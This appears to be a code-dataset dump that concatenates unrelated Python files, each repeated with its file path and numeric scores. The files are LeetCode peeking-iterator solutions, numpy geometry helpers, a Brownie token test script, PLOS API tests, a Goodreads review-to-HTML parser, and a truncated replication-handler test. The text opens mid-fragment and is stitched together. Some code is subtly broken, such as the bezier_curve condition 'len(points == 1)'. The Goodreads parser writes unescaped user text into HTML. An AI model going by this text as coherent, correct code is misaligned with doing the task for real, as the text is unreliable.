definition=definition,
timeout=core.Duration.seconds(30),
) | 0.66072 | 0.152568 |
# V1
# https://leetcode.com/problems/peeking-iterator/discuss/123811/Python-solution
class PeekingIterator(object):
def __init__(self, iterator):
"""
Initialize your data structure here.
:type iterator: Iterator
"""
self.next_val = None
self.iterator = iterator
if self.iterator.hasNext():
self.next_val = iterator.next()
def peek(self):
"""
Returns the next element in the iteration without advancing the iterator.
:rtype: int
"""
return self.next_val
def next(self):
"""
:rtype: int
"""
cur_val = self.next_val
if self.iterator.hasNext():
self.next_val = self.iterator.next()
else:
self.next_val = None
return cur_val
def hasNext(self):
"""
:rtype: bool
"""
return self.next_val is not None
# V1'
# https://leetcode.com/problems/peeking-iterator/discuss/72626/Simple-Python-Solution
class PeekingIterator(object):
def __init__(self, iterator):
self.iter = iterator
self.temp = self.iter.next() if self.iter.hasNext() else None
def peek(self):
return self.temp
def next(self):
ret = self.temp
self.temp = self.iter.next() if self.iter.hasNext() else None
return ret
def hasNext(self):
return self.temp is not None
# V1''
# https://leetcode.com/problems/peeking-iterator/discuss/729795/Python-Solution
class PeekingIterator:
def __init__(self, iterator):
"""
Initialize your data structure here.
:type iterator: Iterator
"""
self.iter = iterator
self.cache = None
def peek(self):
"""
Returns the next element in the iteration without advancing the iterator.
:rtype: int
"""
if self.cache is None:
self.cache = self.iter.next()
return self.cache
def next(self):
"""
:rtype: int
"""
if self.cache is not None:
temp = self.cache
self.cache = None
return temp
return self.iter.next()
def hasNext(self):
"""
:rtype: bool
"""
return self.cache is not None or self.iter.hasNext()
# V2 | leetcode_python/Design/peeking-iterator.py |
# V1
# https://leetcode.com/problems/peeking-iterator/discuss/123811/Python-solution
class PeekingIterator(object):
def __init__(self, iterator):
"""
Initialize your data structure here.
:type iterator: Iterator
"""
self.next_val = None
self.iterator = iterator
if self.iterator.hasNext():
self.next_val = iterator.next()
def peek(self):
"""
Returns the next element in the iteration without advancing the iterator.
:rtype: int
"""
return self.next_val
def next(self):
"""
:rtype: int
"""
cur_val = self.next_val
if self.iterator.hasNext():
self.next_val = self.iterator.next()
else:
self.next_val = None
return cur_val
def hasNext(self):
"""
:rtype: bool
"""
return self.next_val is not None
# V1'
# https://leetcode.com/problems/peeking-iterator/discuss/72626/Simple-Python-Solution
class PeekingIterator(object):
def __init__(self, iterator):
self.iter = iterator
self.temp = self.iter.next() if self.iter.hasNext() else None
def peek(self):
return self.temp
def next(self):
ret = self.temp
self.temp = self.iter.next() if self.iter.hasNext() else None
return ret
def hasNext(self):
return self.temp is not None
# V1''
# https://leetcode.com/problems/peeking-iterator/discuss/729795/Python-Solution
class PeekingIterator:
def __init__(self, iterator):
"""
Initialize your data structure here.
:type iterator: Iterator
"""
self.iter = iterator
self.cache = None
def peek(self):
"""
Returns the next element in the iteration without advancing the iterator.
:rtype: int
"""
if self.cache is None:
self.cache = self.iter.next()
return self.cache
def next(self):
"""
:rtype: int
"""
if self.cache is not None:
temp = self.cache
self.cache = None
return temp
return self.iter.next()
def hasNext(self):
"""
:rtype: bool
"""
return self.cache is not None or self.iter.hasNext()
# V2 | 0.88894 | 0.142769 |
import numpy as np
__all__ = [
'distance', 'is_close', 'is_same', 'normalize'
]
def distance(p1, p2):
"""
Return the euclidean distance between the two points
parameters
----------
p1 : numpy array
N-array describing the position of p1
p2 : numpy array
N-array describing the position of p2
"""
squared_dist = (p2 - p1)**2
sum_squared = np.sum(squared_dist)
return np.sqrt(sum_squared)
def is_close(p1, p2, limit=1e-3):
"""
Return true if p1 and p2 is closer than the defined limit (default 1e-3)
according to euclidean distance. False underwise
parameters
----------
p1 : numpy array
N-array describing the position of p1
p2 : numpy array
N-array describing the position of p2
limit : float (optional)
The maximum distance p1 is allowed to be away from p2
returns
-------
bool
Whether the two points are close
"""
return distance(p1, p2) <= limit
def is_same(p1, p2):
"""
Return true if p1 and p2 is at the same position according to euclidean distance. False underwise
parameters
----------
p1 : numpy array
N-array describing the position of p1
p2 : numpy array
N-array describing the position of p2
returns
-------
bool
Whether the two points are at the same position
"""
return is_close(p1, p2, limit=0)
def normalize(vec):
"""
Normalize the given vector
parameters
----------
vec : numpy array
Vector to be normalized
"""
return vec/np.linalg.norm(vec)
def bezier_curve(t, points):
"""
Returns the point on the bezier curve defined by the given points and parameterized between [0,1]
#TODO Might only work in 1D
parameters
---------
t : float
The current point on the line. Defined as a real number between [0,1] where 0 is the beginning points and 1 is the ending
points: numpy array of the points
Control points that define the bezier curve
"""
if len(points == 1):
return points[0]
return bezier_curve(t, points[:-1]) * (1 - t) + bezier_curve(t, points[1:]) * t | alloy/math/basic.py | import numpy as np
__all__ = [
'distance', 'is_close', 'is_same', 'normalize'
]
def distance(p1, p2):
"""
Return the euclidean distance between the two points
parameters
----------
p1 : numpy array
N-array describing the position of p1
p2 : numpy array
N-array describing the position of p2
"""
squared_dist = (p2 - p1)**2
sum_squared = np.sum(squared_dist)
return np.sqrt(sum_squared)
def is_close(p1, p2, limit=1e-3):
"""
Return true if p1 and p2 is closer than the defined limit (default 1e-3)
according to euclidean distance. False underwise
parameters
----------
p1 : numpy array
N-array describing the position of p1
p2 : numpy array
N-array describing the position of p2
limit : float (optional)
The maximum distance p1 is allowed to be away from p2
returns
-------
bool
Whether the two points are close
"""
return distance(p1, p2) <= limit
def is_same(p1, p2):
"""
Return true if p1 and p2 is at the same position according to euclidean distance. False underwise
parameters
----------
p1 : numpy array
N-array describing the position of p1
p2 : numpy array
N-array describing the position of p2
returns
-------
bool
Whether the two points are at the same position
"""
return is_close(p1, p2, limit=0)
def normalize(vec):
"""
Normalize the given vector
parameters
----------
vec : numpy array
Vector to be normalized
"""
return vec/np.linalg.norm(vec)
def bezier_curve(t, points):
"""
Returns the point on the bezier curve defined by the given points and parameterized between [0,1]
#TODO Might only work in 1D
parameters
---------
t : float
The current point on the line. Defined as a real number between [0,1] where 0 is the beginning points and 1 is the ending
points: numpy array of the points
Control points that define the bezier curve
"""
if len(points == 1):
return points[0]
return bezier_curve(t, points[:-1]) * (1 - t) + bezier_curve(t, points[1:]) * t | 0.872102 | 0.816113 |
print(" -- Script start -- ")
from brownie import accounts
from .pcat import PCat
# Account names are not important, but they must be unique.
me = accounts[0]
# MT
rudeus_greyart = accounts[1]
eris_whats_her_face = accounts[2]
# TSCOG
seol_jihu = accounts[3]
yeo_soohi = accounts[4]
# TBATE
arthur_lewyin = accounts[5]
tessia_earlith = accounts[6]
caera_whats_her_face = accounts[7]
# WB
jay = accounts[8]
shelly = accounts[9]
# Deploy contract
pussy_cat = PCat(me)
def main():
print(" -- Main start -- ")
# Chequea data
print(pussy_cat.name())
print(pussy_cat.symbol())
print(pussy_cat.decimals())
print(pussy_cat.total_supply())
# transfer_tests()
# mint_tests()
# burn_tests()
pause_tests()
# role_tests()
# owner_tests()
print(" -- Main end -- ")
def transfer_tests():
print(" -- Transfer start -- ")
# Intenta transferir normal
pussy_cat.transfer(rudeus_greyart, 100)
# Intenta transferir sin saldo
try:
pussy_cat.transfer(rudeus_greyart, 100, eris_whats_her_face)
print("Nope")
except:
print("Success")
pussy_cat.transfer(rudeus_greyart, 100, me)
# Transfer from redeus
pussy_cat.transfer(eris_whats_her_face, 100, rudeus_greyart)
# Transfer from redeus to himseld
pussy_cat.transfer(rudeus_greyart, 10, rudeus_greyart)
pretty_print_balance(rudeus_greyart)
pretty_print_balance(me)
pretty_print_balance(eris_whats_her_face)
print(" -- Transfer end -- \n")
def mint_tests():
print(" -- Mint start -- ")
# Send some tokens to TSCOG characters
pussy_cat.transfer(seol_jihu, 100)
pussy_cat.transfer(yeo_soohi, 100)
pretty_print_balance(me)
# Add some tokens to me
pussy_cat.mint(me, 400)
pretty_print_balance(me)
print(f"Total supply: {pussy_cat.total_supply()}")
# Try and mint as a non roler
pussy_cat.mint(seol_jihu, 400, yeo_soohi)
pretty_print_balance(seol_jihu)
# Make yeo_soohi a roler
pussy_cat.add_role(yeo_soohi, 3)
pussy_cat.mint(seol_jihu, 400, yeo_soohi)
pretty_print_balance(seol_jihu)
print(f"Total supply: {pussy_cat.total_supply()}")
print(" -- Mint end -- \n")
def burn_tests():
print(" -- Burn start -- ")
# Send some tokens to TBATE characters
pussy_cat.transfer(arthur_lewyin, 500)
pussy_cat.transfer(tessia_earlith, 200)
# I like Caera but comeon Tessia is the one.
pussy_cat.transfer(caera_whats_her_face, 100)
# Burn
pussy_cat.burn(499, arthur_lewyin)
pretty_print_balance(arthur_lewyin)
pussy_cat.burn(199, tessia_earlith)
pretty_print_balance(tessia_earlith)
pussy_cat.burn(99, caera_whats_her_face)
pretty_print_balance(caera_whats_her_face)
print(f"Total supply: {pussy_cat.total_supply()}")
print(" -- Burn end -- \n")
def pause_tests():
print(" -- Pause start -- ")
# Cause buhl fresh
pussy_cat.transfer(jay, 10000)
pussy_cat.transfer(shelly, 10000)
# Intenta pause
pussy_cat.pause_contract(jay)
print("If failed good!")
pussy_cat.pause_contract(me)
print(pussy_cat.paused())
try:
# Intenta transfer
pussy_cat.transfer(shelly, 100, jay)
except:
pass
# Mint as owner
pussy_cat.mint(me, 400)
# Mint as non owner
pussy_cat.mint(shelly, 400, jay)
# Intenta burn
pussy_cat.burn(200, jay)
# Now burn as owner
pussy_cat.burn(200, me)
# Unpause
pussy_cat.pause_contract(shelly)
print("It failed good!")
pussy_cat.pause_contract(me)
pussy_cat.transfer(jay, 100, shelly)
pussy_cat.mint(shelly, 400)
pussy_cat.burn(200, shelly)
print(" -- Pause end -- \n")
def role_tests():
print(" -- Role start -- ")
# Add roles
pussy_cat.add_role(rudeus_greyart, 1) # Admin
pussy_cat.add_role(eris_whats_her_face, 2) # Pauser
pussy_cat.add_role(seol_jihu, 3) # Minter
pussy_cat.add_role(jay, 3) # Minter
# Add to a role as admin
pussy_cat.add_role(arthur_lewyin, 2, rudeus_greyart)
# Remove from a role as admin
pussy_cat.remove_role(arthur_lewyin, rudeus_greyart)
# Now try to add a admin as admin
pussy_cat.add_role(arthur_lewyin, 1, rudeus_greyart)
print("It failed good!")
pussy_cat.add_admin(arthur_lewyin, rudeus_greyart)
print("It failed good!")
pussy_cat.add_admin(arthur_lewyin)
# Now try to remove a admin as admin
pussy_cat.remove_role(arthur_lewyin, rudeus_greyart)
print("It failed good!")
pussy_cat.remove_role(arthur_lewyin)
# Now mint as a minter and puase as a pauser
pussy_cat.mint(seol_jihu, 400)
pussy_cat.pause_contract(eris_whats_her_face)
# Unpause as admin
pussy_cat.pause_contract(rudeus_greyart)
# And renounce role
pussy_cat.renounce_role(jay)
print(f"{address_to_name(jay)}'s role: {pussy_cat.role_of(jay)}")
print(" -- Role end -- \n")
def owner_tests():
print(" -- Owner start -- ")
# Send some tokens to Artur (Future owner)
pussy_cat.transfer(arthur_lewyin, 10000)
# Chequea quien es owner
print(address_to_name(pussy_cat.owner()))
# Chequea is arthur already has a role
if pussy_cat.role_of(arthur_lewyin) != 0:
print("Arthur has role")
pussy_cat.remove_role(arthur_lewyin)
# Try as someone else to transfer to arthur
pussy_cat.change_owner(arthur_lewyin, caera_whats_her_face)
print("Should fail ^^")
# Now actually transfer to arthur
pussy_cat.change_owner(arthur_lewyin, me)
print(address_to_name(pussy_cat.owner()))
# Pause el contract y hacemos la vaina como author
pussy_cat.pause_contract(arthur_lewyin)
pussy_cat.transfer(caera_whats_her_face, 500, arthur_lewyin)
pussy_cat.transfer(tessia_earlith, 1000, arthur_lewyin) # Because Tess is better
# Now renouce ownership
pussy_cat.stop_being_owner(arthur_lewyin)
print(pussy_cat.owner())
print(" -- Owner end -- \n")
def address_to_name(address):
name = "Unknown"
if address == me:
name = "Me"
elif address == rudeus_greyart:
name = "<NAME>"
elif address == eris_whats_her_face:
name = "Eris"
elif address == seol_jihu:
name = "<NAME>"
elif address == yeo_soohi:
name = "<NAME>"
elif address == arthur_lewyin:
name = "<NAME>"
elif address == tessia_earlith:
name = "<NAME>"
elif address == caera_whats_her_face:
name = "Caera"
elif address == jay:
name = "Jay"
elif address == shelly:
name = "Shelly"
return name
def pretty_print_balance(address):
print(f"{address_to_name(address)}: {pussy_cat.balance_of(address)}") | scripts/main.py | print(" -- Script start -- ")
from brownie import accounts
from .pcat import PCat
# Account names are not important, but they must be unique.
me = accounts[0]
# MT
rudeus_greyart = accounts[1]
eris_whats_her_face = accounts[2]
# TSCOG
seol_jihu = accounts[3]
yeo_soohi = accounts[4]
# TBATE
arthur_lewyin = accounts[5]
tessia_earlith = accounts[6]
caera_whats_her_face = accounts[7]
# WB
jay = accounts[8]
shelly = accounts[9]
# Deploy contract
pussy_cat = PCat(me)
def main():
print(" -- Main start -- ")
# Chequea data
print(pussy_cat.name())
print(pussy_cat.symbol())
print(pussy_cat.decimals())
print(pussy_cat.total_supply())
# transfer_tests()
# mint_tests()
# burn_tests()
pause_tests()
# role_tests()
# owner_tests()
print(" -- Main end -- ")
def transfer_tests():
print(" -- Transfer start -- ")
# Intenta transferir normal
pussy_cat.transfer(rudeus_greyart, 100)
# Intenta transferir sin saldo
try:
pussy_cat.transfer(rudeus_greyart, 100, eris_whats_her_face)
print("Nope")
except:
print("Success")
pussy_cat.transfer(rudeus_greyart, 100, me)
# Transfer from redeus
pussy_cat.transfer(eris_whats_her_face, 100, rudeus_greyart)
# Transfer from redeus to himseld
pussy_cat.transfer(rudeus_greyart, 10, rudeus_greyart)
pretty_print_balance(rudeus_greyart)
pretty_print_balance(me)
pretty_print_balance(eris_whats_her_face)
print(" -- Transfer end -- \n")
def mint_tests():
print(" -- Mint start -- ")
# Send some tokens to TSCOG characters
pussy_cat.transfer(seol_jihu, 100)
pussy_cat.transfer(yeo_soohi, 100)
pretty_print_balance(me)
# Add some tokens to me
pussy_cat.mint(me, 400)
pretty_print_balance(me)
print(f"Total supply: {pussy_cat.total_supply()}")
# Try and mint as a non roler
pussy_cat.mint(seol_jihu, 400, yeo_soohi)
pretty_print_balance(seol_jihu)
# Make yeo_soohi a roler
pussy_cat.add_role(yeo_soohi, 3)
pussy_cat.mint(seol_jihu, 400, yeo_soohi)
pretty_print_balance(seol_jihu)
print(f"Total supply: {pussy_cat.total_supply()}")
print(" -- Mint end -- \n")
def burn_tests():
print(" -- Burn start -- ")
# Send some tokens to TBATE characters
pussy_cat.transfer(arthur_lewyin, 500)
pussy_cat.transfer(tessia_earlith, 200)
# I like Caera but comeon Tessia is the one.
pussy_cat.transfer(caera_whats_her_face, 100)
# Burn
pussy_cat.burn(499, arthur_lewyin)
pretty_print_balance(arthur_lewyin)
pussy_cat.burn(199, tessia_earlith)
pretty_print_balance(tessia_earlith)
pussy_cat.burn(99, caera_whats_her_face)
pretty_print_balance(caera_whats_her_face)
print(f"Total supply: {pussy_cat.total_supply()}")
print(" -- Burn end -- \n")
def pause_tests():
print(" -- Pause start -- ")
# Cause buhl fresh
pussy_cat.transfer(jay, 10000)
pussy_cat.transfer(shelly, 10000)
# Intenta pause
pussy_cat.pause_contract(jay)
print("If failed good!")
pussy_cat.pause_contract(me)
print(pussy_cat.paused())
try:
# Intenta transfer
pussy_cat.transfer(shelly, 100, jay)
except:
pass
# Mint as owner
pussy_cat.mint(me, 400)
# Mint as non owner
pussy_cat.mint(shelly, 400, jay)
# Intenta burn
pussy_cat.burn(200, jay)
# Now burn as owner
pussy_cat.burn(200, me)
# Unpause
pussy_cat.pause_contract(shelly)
print("It failed good!")
pussy_cat.pause_contract(me)
pussy_cat.transfer(jay, 100, shelly)
pussy_cat.mint(shelly, 400)
pussy_cat.burn(200, shelly)
print(" -- Pause end -- \n")
def role_tests():
print(" -- Role start -- ")
# Add roles
pussy_cat.add_role(rudeus_greyart, 1) # Admin
pussy_cat.add_role(eris_whats_her_face, 2) # Pauser
pussy_cat.add_role(seol_jihu, 3) # Minter
pussy_cat.add_role(jay, 3) # Minter
# Add to a role as admin
pussy_cat.add_role(arthur_lewyin, 2, rudeus_greyart)
# Remove from a role as admin
pussy_cat.remove_role(arthur_lewyin, rudeus_greyart)
# Now try to add a admin as admin
pussy_cat.add_role(arthur_lewyin, 1, rudeus_greyart)
print("It failed good!")
pussy_cat.add_admin(arthur_lewyin, rudeus_greyart)
print("It failed good!")
pussy_cat.add_admin(arthur_lewyin)
# Now try to remove a admin as admin
pussy_cat.remove_role(arthur_lewyin, rudeus_greyart)
print("It failed good!")
pussy_cat.remove_role(arthur_lewyin)
# Now mint as a minter and puase as a pauser
pussy_cat.mint(seol_jihu, 400)
pussy_cat.pause_contract(eris_whats_her_face)
# Unpause as admin
pussy_cat.pause_contract(rudeus_greyart)
# And renounce role
pussy_cat.renounce_role(jay)
print(f"{address_to_name(jay)}'s role: {pussy_cat.role_of(jay)}")
print(" -- Role end -- \n")
def owner_tests():
print(" -- Owner start -- ")
# Send some tokens to Artur (Future owner)
pussy_cat.transfer(arthur_lewyin, 10000)
# Chequea quien es owner
print(address_to_name(pussy_cat.owner()))
# Chequea is arthur already has a role
if pussy_cat.role_of(arthur_lewyin) != 0:
print("Arthur has role")
pussy_cat.remove_role(arthur_lewyin)
# Try as someone else to transfer to arthur
pussy_cat.change_owner(arthur_lewyin, caera_whats_her_face)
print("Should fail ^^")
# Now actually transfer to arthur
pussy_cat.change_owner(arthur_lewyin, me)
print(address_to_name(pussy_cat.owner()))
# Pause el contract y hacemos la vaina como author
pussy_cat.pause_contract(arthur_lewyin)
pussy_cat.transfer(caera_whats_her_face, 500, arthur_lewyin)
pussy_cat.transfer(tessia_earlith, 1000, arthur_lewyin) # Because Tess is better
# Now renouce ownership
pussy_cat.stop_being_owner(arthur_lewyin)
print(pussy_cat.owner())
print(" -- Owner end -- \n")
def address_to_name(address):
name = "Unknown"
if address == me:
name = "Me"
elif address == rudeus_greyart:
name = "<NAME>"
elif address == eris_whats_her_face:
name = "Eris"
elif address == seol_jihu:
name = "<NAME>"
elif address == yeo_soohi:
name = "<NAME>"
elif address == arthur_lewyin:
name = "<NAME>"
elif address == tessia_earlith:
name = "<NAME>"
elif address == caera_whats_her_face:
name = "Caera"
elif address == jay:
name = "Jay"
elif address == shelly:
name = "Shelly"
return name
def pretty_print_balance(address):
print(f"{address_to_name(address)}: {pussy_cat.balance_of(address)}") | 0.157914 | 0.124985 |
import arcas
import pandas
def test_setup():
api = arcas.Plos()
assert api.standard == 'http://api.plos.org/search?q='
def test_keys():
api = arcas.Plos()
assert api.keys() == ['url', 'key', 'unique_key', 'title', 'author', 'abstract',
'doi', 'date', 'journal', 'provenance', 'category', 'score',
'open_access']
def test_parameters_and_url_author():
api = arcas.Plos()
parameters = api.parameters_fix(author='Glynatsi')
assert parameters == ['author:"Glynatsi"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=author:"Glynatsi"'
def test_parameters_and_url_title():
api = arcas.Plos()
parameters = api.parameters_fix(title='Game')
assert parameters == ['title:"Game"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=title:"Game"'
def test_parameters_and_url_abstract():
api = arcas.Plos()
parameters = api.parameters_fix(abstract='Game')
assert parameters == ['abstract:"Game"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=abstract:"Game"'
def test_parameters_and_url_category():
api = arcas.Plos()
parameters = api.parameters_fix(category='game theory')
assert parameters == ['subject:"game theory"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=subject:"game theory"'
def test_parameters_and_url_journal():
api = arcas.Plos()
parameters = api.parameters_fix(journal='PLOS ONE')
assert parameters == ['journal:"PLOS ONE"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=journal:"PLOS ONE"'
def test_parameters_and_url_record():
api = arcas.Plos()
parameters = api.parameters_fix(records=1)
assert parameters == ['rows=1']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=rows=1'
def test_parameters_and_url_start():
api = arcas.Plos()
parameters = api.parameters_fix(start=1)
assert parameters == ['start=1']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=start=1'
def test_create_url_search():
api = arcas.Plos()
parameters = api.parameters_fix(title='Nash', abstract='mixed', records=2, start=5)
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=title:"Nash"+AND+abstract:"mixed"&rows=2&start=5'
def test_to_dataframe():
dummy_article = {'response': [],
'id': '10.0000/journal.pone.00000',
'journal': 'PLOS ONE',
'publication_date': '2010-12-12T00:00:00Z',
'article_type': 'Research Article',
'author_display': ['<NAME>', '<NAME>'],
'abstract': "Abstract",
'title_display': "Title",
'score': '10'}
api = arcas.Plos()
article = api.to_dataframe(dummy_article)
assert isinstance(article, pandas.core.frame.DataFrame)
assert list(article.columns) == api.keys()
assert len(article['url']) == 2
assert article['url'].unique()[0] == 'https://doi.org/' + dummy_article['id']
assert article['key'].unique()[0] == 'Glynatsi2010'
assert article['title'].unique()[0] == 'Title'
assert article['abstract'].unique()[0] == 'Abstract'
assert article['journal'].unique()[0] == 'PLOS ONE'
assert article['date'].unique()[0] == 2010
assert article['doi'].unique()[0] == dummy_article['id']
assert article['open_access'].unique()[0] == 'Not available'
assert article['score'].unique()[0] == 10 | tests/test_plos.py | import arcas
import pandas
def test_setup():
api = arcas.Plos()
assert api.standard == 'http://api.plos.org/search?q='
def test_keys():
api = arcas.Plos()
assert api.keys() == ['url', 'key', 'unique_key', 'title', 'author', 'abstract',
'doi', 'date', 'journal', 'provenance', 'category', 'score',
'open_access']
def test_parameters_and_url_author():
api = arcas.Plos()
parameters = api.parameters_fix(author='Glynatsi')
assert parameters == ['author:"Glynatsi"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=author:"Glynatsi"'
def test_parameters_and_url_title():
api = arcas.Plos()
parameters = api.parameters_fix(title='Game')
assert parameters == ['title:"Game"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=title:"Game"'
def test_parameters_and_url_abstract():
api = arcas.Plos()
parameters = api.parameters_fix(abstract='Game')
assert parameters == ['abstract:"Game"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=abstract:"Game"'
def test_parameters_and_url_category():
api = arcas.Plos()
parameters = api.parameters_fix(category='game theory')
assert parameters == ['subject:"game theory"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=subject:"game theory"'
def test_parameters_and_url_journal():
api = arcas.Plos()
parameters = api.parameters_fix(journal='PLOS ONE')
assert parameters == ['journal:"PLOS ONE"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=journal:"PLOS ONE"'
def test_parameters_and_url_record():
api = arcas.Plos()
parameters = api.parameters_fix(records=1)
assert parameters == ['rows=1']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=rows=1'
def test_parameters_and_url_start():
api = arcas.Plos()
parameters = api.parameters_fix(start=1)
assert parameters == ['start=1']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=start=1'
def test_create_url_search():
api = arcas.Plos()
parameters = api.parameters_fix(title='Nash', abstract='mixed', records=2, start=5)
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=title:"Nash"+AND+abstract:"mixed"&rows=2&start=5'
def test_to_dataframe():
dummy_article = {'response': [],
'id': '10.0000/journal.pone.00000',
'journal': 'PLOS ONE',
'publication_date': '2010-12-12T00:00:00Z',
'article_type': 'Research Article',
'author_display': ['<NAME>', '<NAME>'],
'abstract': "Abstract",
'title_display': "Title",
'score': '10'}
api = arcas.Plos()
article = api.to_dataframe(dummy_article)
assert isinstance(article, pandas.core.frame.DataFrame)
assert list(article.columns) == api.keys()
assert len(article['url']) == 2
assert article['url'].unique()[0] == 'https://doi.org/' + dummy_article['id']
assert article['key'].unique()[0] == 'Glynatsi2010'
assert article['title'].unique()[0] == 'Title'
assert article['abstract'].unique()[0] == 'Abstract'
assert article['journal'].unique()[0] == 'PLOS ONE'
assert article['date'].unique()[0] == 2010
assert article['doi'].unique()[0] == dummy_article['id']
assert article['open_access'].unique()[0] == 'Not available'
assert article['score'].unique()[0] == 10 | 0.595728 | 0.454351 |
import xml.etree.ElementTree as ET
import sys
from html.parser import HTMLParser
class MLStripper(HTMLParser):
def __init__(self):
self.reset()
self.strict = False
self.convert_charrefs = True
self.fed = []
def handle_data(self, d):
self.fed.append(d)
def get_data(self):
return "".join(self.fed)
def strip_tags(html):
s = MLStripper()
s.feed(html)
return s.get_data()
def cleantext(data):
if data != None:
return data.strip()
return ""
def getStars(rating):
stars = ""
if rating == 0:
stars = "N/A"
else:
for i in range(0, rating):
stars += '<span class="glyphicon glyphicon-star" aria-hidden="true"></span>'
return stars
def main():
goodreadsxml = sys.argv[1]
root = ET.parse(goodreadsxml).getroot()
# print(
# "<thead><tr><th /><th>Title</th><th>Author</th><th>My rating</th></tr></thead><tbody>"
# )
reviewsfh = open("_includes/goodreadsreviews.html", "w")
bookindex = 0
for item in root.iter("item"):
bookindex = bookindex + 1
title = cleantext(item.find("title").text)
author = cleantext(item.find("author_name").text)
rating = int(strip_tags(cleantext(item.find("user_rating").text)))
# rating = 5
img = cleantext(item.find("book_small_image_url").text)
user_review = cleantext(item.find("user_review").text)
book_description = cleantext(item.find("book_description").text)
book_description = strip_tags(book_description)
book_description = (book_description.encode('ascii', 'ignore')).decode("utf-8")
if user_review != None:
user_review = strip_tags(user_review)
else:
user_review = str(rating) + " stars"
reviewsfh.write(
'<tr class="accordion-toggle" data-toggle="collapse" data-target="#%s">'
% ("book" + str(bookindex))
)
reviewsfh.write('<td><img src="%s"/></td>' % img)
reviewsfh.write("<td>%s</td>" % title)
reviewsfh.write("<td>%s</td>" % author)
reviewsfh.write(
'<td><a href="#" data-toggle="tooltip" data-placement="top" title="%s">'
% user_review
)
reviewsfh.write(getStars(rating))
reviewsfh.write("</td></tr>")
reviewsfh.write(
'<tr><td class="zeroPadding" colspan="5"><div id="%s" class="collapse">%s</div></tr>'
% ("book" + str(bookindex), book_description)
)
reviewsfh.write("</tbody>")
if __name__ == "__main__":
main() | script/parsegoodreads.py | import xml.etree.ElementTree as ET
import sys
from html.parser import HTMLParser
class MLStripper(HTMLParser):
def __init__(self):
self.reset()
self.strict = False
self.convert_charrefs = True
self.fed = []
def handle_data(self, d):
self.fed.append(d)
def get_data(self):
return "".join(self.fed)
def strip_tags(html):
s = MLStripper()
s.feed(html)
return s.get_data()
def cleantext(data):
if data != None:
return data.strip()
return ""
def getStars(rating):
stars = ""
if rating == 0:
stars = "N/A"
else:
for i in range(0, rating):
stars += '<span class="glyphicon glyphicon-star" aria-hidden="true"></span>'
return stars
def main():
goodreadsxml = sys.argv[1]
root = ET.parse(goodreadsxml).getroot()
# print(
# "<thead><tr><th /><th>Title</th><th>Author</th><th>My rating</th></tr></thead><tbody>"
# )
reviewsfh = open("_includes/goodreadsreviews.html", "w")
bookindex = 0
for item in root.iter("item"):
bookindex = bookindex + 1
title = cleantext(item.find("title").text)
author = cleantext(item.find("author_name").text)
rating = int(strip_tags(cleantext(item.find("user_rating").text)))
# rating = 5
img = cleantext(item.find("book_small_image_url").text)
user_review = cleantext(item.find("user_review").text)
book_description = cleantext(item.find("book_description").text)
book_description = strip_tags(book_description)
book_description = (book_description.encode('ascii', 'ignore')).decode("utf-8")
if user_review != None:
user_review = strip_tags(user_review)
else:
user_review = str(rating) + " stars"
reviewsfh.write(
'<tr class="accordion-toggle" data-toggle="collapse" data-target="#%s">'
% ("book" + str(bookindex))
)
reviewsfh.write('<td><img src="%s"/></td>' % img)
reviewsfh.write("<td>%s</td>" % title)
reviewsfh.write("<td>%s</td>" % author)
reviewsfh.write(
'<td><a href="#" data-toggle="tooltip" data-placement="top" title="%s">'
% user_review
)
reviewsfh.write(getStars(rating))
reviewsfh.write("</td></tr>")
reviewsfh.write(
'<tr><td class="zeroPadding" colspan="5"><div id="%s" class="collapse">%s</div></tr>'
% ("book" + str(bookindex), book_description)
)
reviewsfh.write("</tbody>")
if __name__ == "__main__":
main() | 0.159054 | 0.134975 |
from __future__ import absolute_import
from __future__ import unicode_literals
from datetime import datetime
import mock
import pytest
from pymysqlreplication.event import GtidEvent
from pymysqlreplication.event import QueryEvent
from replication_handler.components.simple_binlog_stream_reader_wrapper import SimpleBinlogStreamReaderWrapper
from replication_handler.util.misc import DataEvent
from replication_handler.util.misc import ReplicationHandlerEvent
from replication_handler.util.position import GtidPosition
from replication_handler.util.position import LogPosition
class TestSimpleBinlogStreamReaderWrapper(object):
@pytest.yield_fixture
def patch_stream(self):
with mock.patch(
'replication_handler.components.simple_binlog_stream_reader_wrapper.LowLevelBinlogStreamReaderWrapper'
) as mock_stream:
yield mock_stream
def test_yield_events_when_gtid_enabled(self, mock_db_connections, patch_stream):
gtid_event_0 = mock.Mock(spec=GtidEvent, gtid="sid:11")
query_event_0 = mock.Mock(spec=QueryEvent)
query_event_1 = mock.Mock(spec=QueryEvent)
gtid_event_1 = mock.Mock(spec=GtidEvent, gtid="sid:12")
data_event_0 = mock.Mock(spec=DataEvent)
data_event_1 = mock.Mock(spec=DataEvent)
data_event_2 = mock.Mock(spec=DataEvent)
event_list = [
gtid_event_0,
query_event_0,
data_event_0,
data_event_1,
data_event_2,
gtid_event_1,
query_event_1,
]
patch_stream.return_value.peek.side_effect = event_list
patch_stream.return_value.pop.side_effect = event_list
# set offset to 1, meaning we want to skip event at offset 0
stream = SimpleBinlogStreamReaderWrapper(
mock_db_connections.source_database_config,
mock_db_connections.tracker_database_config,
GtidPosition(
gtid="sid:10",
offset=1
),
gtid_enabled=True
)
results = [
ReplicationHandlerEvent(
event=data_event_1,
position=GtidPosition(gtid="sid:11", offset=2)
),
ReplicationHandlerEvent(
event=data_event_2,
position=GtidPosition(gtid="sid:11", offset=3)
),
ReplicationHandlerEvent(
event=query_event_1,
position=GtidPosition(gtid="sid:12", offset=0)
)
]
for replication_event, result in zip(stream, results):
